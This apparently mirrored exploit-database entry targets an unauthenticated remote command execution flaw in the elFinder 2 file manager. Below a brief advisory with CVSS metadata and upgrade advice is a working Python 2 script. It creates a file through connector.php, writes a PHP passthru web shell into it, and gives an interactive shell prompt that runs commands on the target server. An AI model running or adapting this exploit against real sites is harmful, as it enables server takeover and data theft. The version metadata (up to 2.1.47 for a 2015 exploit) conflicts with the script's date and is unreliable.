elFinder 2 Remote Command Execution (Via File Creation) Vulnerability

vendor:

elFinder

by:

TUNISIAN CYBER

9.3

CVSS

HIGH

Remote Command Execution

CWE

Product Name: elFinder

Affected Version From: 2

Affected Version To: 2.1.47

Patch Exists: YES

Related CWE: N/A

CPE: 2.1.47:elFinder

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: KaliLinux (Debian)

2015

elFinder 2 Remote Command Execution (Via File Creation) Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of elFinder. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the 'cmd' parameter. By creating a file with a crafted name, an attacker can inject arbitrary code into the application. An attacker can leverage this vulnerability to execute code under the context of the web server.

Mitigation:

Upgrade to the latest version of elFinder

Source

Exploit-DB raw data:

#[+] Author: TUNISIAN CYBER
#[+] Title: elFinder 2 Remote Command Execution (Via File Creation) Vulnerability
#[+] Date: 06-05-2015
#[+] Vendor: https://github.com/Studio-42/elFinder
#[+] Type: WebAPP
#[+] Tested on: KaliLinux (Debian)
#[+] Twitter: @TCYB3R
#[+] Time Line:
#    03-05-2015:Vulnerability Discovered
#    03-05-2015:Contacted Vendor
#    04-05-2015:No response
#    05-05-2015:No response
#    06-05-2015:No response
#    06-05-2015:Vulnerability published

import cookielib, urllib
import urllib2
import sys

print"\x20\x20+-------------------------------------------------+"
print"\x20\x20| elFinder Remote Command Execution Vulnerability |"
print"\x20\x20|                 TUNISIAN CYBER                  |"
print"\x20\x20+-------------------------------------------------+"


host = raw_input('\x20\x20Vulnerable Site:')
evilfile = raw_input('\x20\x20EvilFileName:')
path=raw_input('\x20\x20elFinder s Path:')


tcyber = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(tcyber))

create = opener.open('http://'+host+'/'+path+'/php/connector.php?cmd=mkfile&name='+evilfile+'&target=l1_Lw')
#print create.read()

payload = urllib.urlencode({
                            'cmd' : 'put',
                            'target' : 'l1_'+evilfile.encode('base64','strict'),
                            'content' : '<?php passthru($_GET[\'cmd\']); ?>'
                            })

write = opener.open('http://'+host+'/'+path+'/php/connector.php', payload)
#print write.read()
print '\n'
while True:
    try:
        cmd = raw_input('[She3LL]:~# ')

        execute = opener.open('http://'+host+'/'+path+'/admin/js/plugins/elfinder/files/'+evilfile+'?cmd='+urllib.quote(cmd))
        reverse = execute.read()
        print reverse;

        if cmd.strip() == 'exit':
            break

    except Exception:
        break

sys.exit()